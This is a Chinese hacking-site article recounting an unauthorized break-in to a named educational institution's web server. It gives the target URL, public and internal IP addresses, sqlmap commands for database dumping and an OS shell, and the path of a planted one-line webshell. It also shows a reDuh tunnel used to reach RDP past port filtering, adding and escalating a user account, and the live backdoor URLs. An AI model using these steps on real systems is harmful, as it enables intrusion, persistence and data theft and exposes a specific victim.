作品发布     邀请码    设为首页  收藏 

当前位置:文章漏洞 → 文章内容 >> 看我如何SQL注入沦陷一个网站绕过端口限制RDP隧道进服务器


看我如何SQL注入沦陷一个网站绕过端口限制RDP隧道进服务器

更新时间:2014-11-15 16:56:18   作者:佚名  来源:不详

网址:http://shy.hpe.sh.cn

一个sql注入导致的服务器沦陷。



一个事业教育单位,今天就上服务器看看.(声明:未有任何破坏性操作)

没事溜达到这个网址:(注入点)

http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/GetArticleList.aspx?parentid=169

首先是暴库(16个数据库吧):

sqlmap -u "http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/GetArticleList.aspx?parentid=169" --dbs

dbs.png



DBA权限:

dba.png



管理员:

man.png





脱裤暴表就没弄了,要这些数据也没啥用。选择了利用这个渗透进服务器。



下面说重点了。os-shell



sqlmap -u "http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/GetArticleList.aspx?parentid=169" --os-shell

os-shell.png



比较奇怪sqlmap里执行os-shell不顺手,有点问题,现在就是写个马进去就行了。

果断换了种方式写了个一句话:



pango.png





之前报错信息已经暴漏了网站的物理地址,马的物理位置:

d:\mainweb\ParentSchool\CN\jxhd\import.aspx

直接上服务器:

getinfo.png



至此,已经拥有了这台服务器的shell了。

上了个文件getinfo.aspx,这个getinfo.aspx是我等下要用到的。



到这里就在想能否RDP进服务器看看。菜刀里看的着实不舒服。



得到的公网IP信息:

Nmap scan report for 210.22.116.91

Host is up (0.011s latency).

Not shown: 999 filtered ports

PORT STATE SERVICE VERSION

80/tcp open http Microsoft IIS httpd 7.0

Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows



就开了个80端口。



在菜刀里ipconfig下看到的是:

以太网适配器 本地连接:



连接特定的 DNS 后缀 . . . . . . . :

本地链接 IPv6 地址. . . . . . . . : fe80::852a:c63b:2d0a:b032%10

IPv4 地址 . . . . . . . . . . . . : 10.11.124.5

子网掩码 . . . . . . . . . . . . : 255.255.255.0

默认网关. . . . . . . . . . . . . : 10.11.124.1



原来是这样的:

公网ip地址:210.22.116.91 这个只开了80端口

内网ip地址:10.11.124.5



要么是防火墙,要么做了端口映射,直接访问内网ip地址:10.11.124.5肯定是不行的了。怎么办?





上面的上传的那个getinfo.aspx文件的作用来了。



这里reDuh隧道穿透了:



java -jar reDuhClient.jar http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/getinfo.aspx



给大家弄个截图,大致会出现下面界面:

1.png





打开本地1010端口,使用telnet或者nc连接本地的1010端口:



2.png





创建隧道:[createTunnel]1234:127.0.0.1:3389

nc本地1010端口,将本地1234端口与远程的服务器端3389端口绑定

3.png







ok,基本工作均已完成。下面在用菜刀添加个用户:



demo.png





密码就不显示了。



提升权限至administrators组





好了,这就全部完成了:



mstsc打开本地127.0.0.1:1234端口,输入刚添加的用户名密码。直接RDP进内网吧:





rdp.png





这样就想操作你自己的电脑一样了,想干什么就干什么。































漏洞证明:

如上。



一句话:

http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/import.aspx

RDP隧道:

http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/getinfo.aspx

修复方案:

过滤

责任编辑:华中帝国        



本文引用网址: 

看我如何SQL注入沦陷一个网站绕过端口限制RDP隧道进服务器的相关文章
发表评论

用户名: 查看更多评论

分 值:100分 85分 70分 55分 40分 25分 10分 0分

内 容:

         (注“”为必填内容。) 验证码: 验证码,看不清楚?请点击刷新验证码